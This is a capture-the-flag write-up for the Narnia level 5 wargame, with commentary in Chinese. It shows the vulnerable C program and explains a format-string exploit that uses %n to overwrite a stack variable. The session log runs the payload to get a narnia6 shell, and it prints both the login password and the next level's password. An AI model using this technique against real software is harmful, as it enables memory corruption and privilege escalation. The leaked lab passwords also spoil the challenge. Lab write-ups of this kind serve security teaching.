narnia5

/** narnia5.c */

/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
int main(int argc, char **argv){
	int i = 1;
	char buffer[64];

	snprintf(buffer, sizeof buffer, argv[1]);
	buffer[sizeof (buffer) - 1] = 0;
	printf("Change i's value from 1 -> 500. ");

	if(i==500){
		printf("GOOD\n");
		system("/bin/sh");
	}

	printf("No way...let me give you a hint!\n");
	printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
	printf ("i = %d (%p)\n", i, &i);
	return 0;
}

栈环境

格式化漏洞，在调用snprintf之前栈环境如上图所示，

第一个参数为buffer的地址 这里为0xffffd01c

第二个参数为buffer的长度 这里为0x40 既64字节

第三个参数为格式化串的地址 这里为0xffffd2f5

我们输入的格式化串为 python -c 'print "\xcc\xd5\xff\xff" + "%496x" + "%5$n"'

本来按照snprintf的格式， 格式化串后面应该带两个参数的， 一个是整型值， 对应%496x， 另一个是指向整型值的指针，对应%5$n

这样就可以解释为： 把i的地址0xffffd5cc输入到buffer中， 把图中argument 1的值以16进制的形式输出，并且补足496字节，这样snprintf就输出了500字节

虽然只有64字节填入buffer中， 并且把snprintf输出的总字节数，既500写入到第五个argument指针指向的值处，第五个argument就是buffer的首地址

内容是i的地址， 最终就是把i的值改为500

root@today:~# ssh [email protected]

[email protected]'s password: faimahchiy

narnia5@melinda:~$ cd /tmp/shadowcoder5

narnia5@melinda:/tmp/shadowcoder5$ ls
narnia5  narnia5.c  sleep.sh

narnia5@melinda:/tmp/shadowcoder5$ /narnia/narnia5 `python -c 'print "\xff\xff\xff\xff" + "%496x" + "%5$n"'`
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [����                            �] (34)
i = 1 (0xffffd5cc)

narnia5@melinda:/tmp/shadowcoder5$ /narnia/narnia5 `python -c 'print "\xcc\xd5\xff\xff" + "%496x" + "%5$n"'`
Change i's value from 1 -> 500. GOOD
$ whoami
narnia6
$ cat /etc/narnia_pass/narnia6
neezocaeng
$